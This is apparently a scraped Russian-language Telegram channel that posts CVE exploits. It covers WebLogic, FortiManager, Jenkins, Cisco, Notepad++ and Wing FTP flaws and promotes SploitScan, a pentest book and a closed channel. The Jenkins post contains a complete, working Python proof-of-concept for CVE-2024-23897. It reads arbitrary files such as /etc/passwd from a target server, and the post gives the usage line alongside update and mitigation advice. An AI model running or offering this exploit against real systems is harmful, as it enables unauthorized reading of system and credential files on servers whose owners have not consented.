Самая большая база данных по CVE-эксплойтам со всего интернета.
Сайт - cvexploits
#cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14
Критическая уязвимость #CVE-2024-21216 в Oracle #WebLogic Server - Позволяет неаутентифицированному злоумышленнику, имеющему доступ к сети через T3 и IIOP привести к полному захвату сервера.
CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0
🐱 GitHub CVE-2024-21216
#CVE
👉 Подписаться 👈
CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0
🐱 GitHub CVE-2024-21216
#CVE
👉 Подписаться 👈
🔥10❤4💔1
Sploitscan
Предустановлен с версии 2024.1 в Kali Linux
🟢 Для чего используется:
Sploitscan находит уязвимости безопасности в ОС и приложениях.
🟢 Функции:
- Простой интерфейс командной строки
- Сканирует несколько ОС и приложений
- Обнаруживает множество уязвимостей
- Предоставляет подробную информацию
- Настраиваемый
Установка:
Сканирование ОС:
Показывает уязвимости с подробностями, такими как идентификатор CVE ID, описание, серьезность, влияние и решения.
Сканирование приложениe:
Информация об уязвимости:
Замените на идентификатор CVE ID.
✍️ Примечание:
- Для некоторых уязвимостей требуются дополнительные инструменты.
- Используйте ответственно, чтобы избежать повреждений.
- Сочетайте с другими инструментами для полной защиты.
🐱 Github: https://github.com/xaitax/SploitScan
🐧 Скачать с официального сайта: https://www.kali.org/tools/sploitscan/
👉 Подписаться 👈
#CVE
Предустановлен с версии 2024.1 в Kali Linux
Sploitscan находит уязвимости безопасности в ОС и приложениях.
- Простой интерфейс командной строки
- Сканирует несколько ОС и приложений
- Обнаруживает множество уязвимостей
- Предоставляет подробную информацию
- Настраиваемый
Установка:
sudo apt install sploitscan
Сканирование ОС:
sploitscan scan
Показывает уязвимости с подробностями, такими как идентификатор CVE ID, описание, серьезность, влияние и решения.
Сканирование приложениe:
sploitscan scan --target <target_address> --port <port_number> --service <service_name>
Информация об уязвимости:
sploitscan info <vulnerability_id>
Замените на идентификатор CVE ID.
- Для некоторых уязвимостей требуются дополнительные инструменты.
- Используйте ответственно, чтобы избежать повреждений.
- Сочетайте с другими инструментами для полной защиты.
👉 Подписаться 👈
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14
This media is not supported in your browser
VIEW IN TELEGRAM
Fortimanager
Неаутентифицированное удаленное выполнение кода, также известное как fortijump CVE-2024-47575
Концепции (POC) для уязвимости с оценкой CVSS 9.8 в FortiManager, их инструменте для централизованного управления устройствами FortiGate.
#CVE #CVE2024
👉 Подписаться 👈
Неаутентифицированное удаленное выполнение кода, также известное как fortijump CVE-2024-47575
Концепции (POC) для уязвимости с оценкой CVSS 9.8 в FortiManager, их инструменте для централизованного управления устройствами FortiGate.
#CVE #CVE2024
👉 Подписаться 👈
🔥11💔1
CVE-2023-27372 — уязвимость типа Privilege Escalation (повышение привилегий), обнаруженная в Ivanti Avalanche, системе управления корпоративными мобильными устройствами (MDM).
🪙 💳 💳 Поддержать автора канала можно тут
👉 Подписаться 👈
#CVE #PHP
👉 Подписаться 👈
#CVE #PHP
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#cve #smb #exploit #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2
Jenkins RCE Arbitrary File Read CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
Использование:
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Jenkins #cve #poc
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Jenkins #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Исправление: Обновление прошивки устройств
Добавления/удаления пользователей и выполнения команд/системных команд
cisco cli
.Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#cisco #rce #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
CVE-2025-49144 — это уязвимость с высоким уровнем риска, связанная с повышением локальных привилегий, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних версий. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии системного уровня, поместив вредоносные исполняемые файлы в тот же каталог, что и установщик.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE #Windows #Linux
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE #Windows #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10💔1
CVE-2025-47812 — это серьёзная проблема, вызванная многочисленными недостатками в системе аутентификации пользователей и управления сеансами Wing FTP Server.
Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.
Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE
Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.
Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10💔1